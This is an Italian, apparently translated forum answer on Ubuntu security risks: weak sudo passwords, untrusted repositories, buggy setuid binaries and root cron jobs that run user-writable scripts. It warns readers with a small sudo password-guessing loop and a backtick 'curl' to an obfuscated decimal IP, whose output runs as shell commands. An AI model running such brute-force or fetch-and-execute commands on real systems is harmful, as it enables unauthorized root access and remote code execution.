Craccare la stessa password di root non è possibile, perché Ubuntu ha disabilitato l'utente root per impostazione predefinita. Tuttavia, se il tuo utente può diventare root tramite sudo e la tua password è facile da indovinare / forza bruta, hai un sistema insicuro. Script di esempio che prova a testare una password:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
L'aggiunta di un repository non attendibile consente l'installazione dei programmi da quel repository. Anche se non si installa esplicitamente un'applicazione come sudo apt-get install [app-from-repo]
, il repository può comunque influire su altri programmi facendo credere a Ubuntu che il repository contenga una versione più recente di un determinato programma.
Il processo di aggiornamento viene eseguito come root, altrimenti i file non possono essere scritti su /usr/bin
o /etc
. Un trigger di installazione viene eseguito anche come root e può eseguire comandi arbitrari e possibilmente dannosi. Ora, non preoccuparti, sono necessari interventi manuali per aggiornare i programmi e i repository Ubuntu sono al sicuro. Il software a sorgente chiuso come Windows non può mai essere considerato completamente attendibile perché non è possibile controllare l'origine per codice dannoso, ma è possibile rivedere l'origine dell'applicazione Ubuntu se necessario (non si applica a programmi proprietari come sun-java6
o Flash).
Come menzionato da Javier Rivera, i bug del kernel possono portare a un'esecuzione arbitraria di codice, ma anche i software con errori sono potenzialmente pericolosi, in particolare setsuid
i binari root con errori (binari che verranno eseguiti con il proprietario del file, root) e altri programmi con errori eseguiti come root.
È possibile creare falle di sicurezza sul proprio sistema se non si presta attenzione a ciò che si sta facendo. Ad esempio, senza comprendere appieno il concetto di cronjobs, hai aggiunto un cronjob a /etc/cron.daily
cui viene eseguito un programma nella tua cartella home (ad es /bin/sh /home/your-username/myscript.sh
. Se il file myscript.sh è scrivibile da te può essere eliminato da te, un exploit potrebbe mettere dannoso codice in myscript.sh
cui verrebbe eseguito come root (escalazione di privilegi).
Per stare al sicuro, usa la tua mente! Non eseguire comandi da fonti non attendibili se non si sa cosa fa. Se qualcuno dice di correre `curl 3221233674`
con il segno di spunta, non farlo. 3221233674 è un altro modo di scrivere 192.0.32.10
(IP di esempio.com). Quindi, sarebbe uguale a:
`curl http://example.com/`
Questi back-tick fanno sì che l'output venga eseguito come comandi shell. In parole povere, "Scarica la pagina http://example.com/ e prova a eseguire la pagina scaricata".
All'inizio, non vedresti qualcosa di dannoso nel comando dato. Ma ora sai che può anche essere abusato.
Controlla sempre i comandi / script che ricevi da fonti non attendibili, come Internet.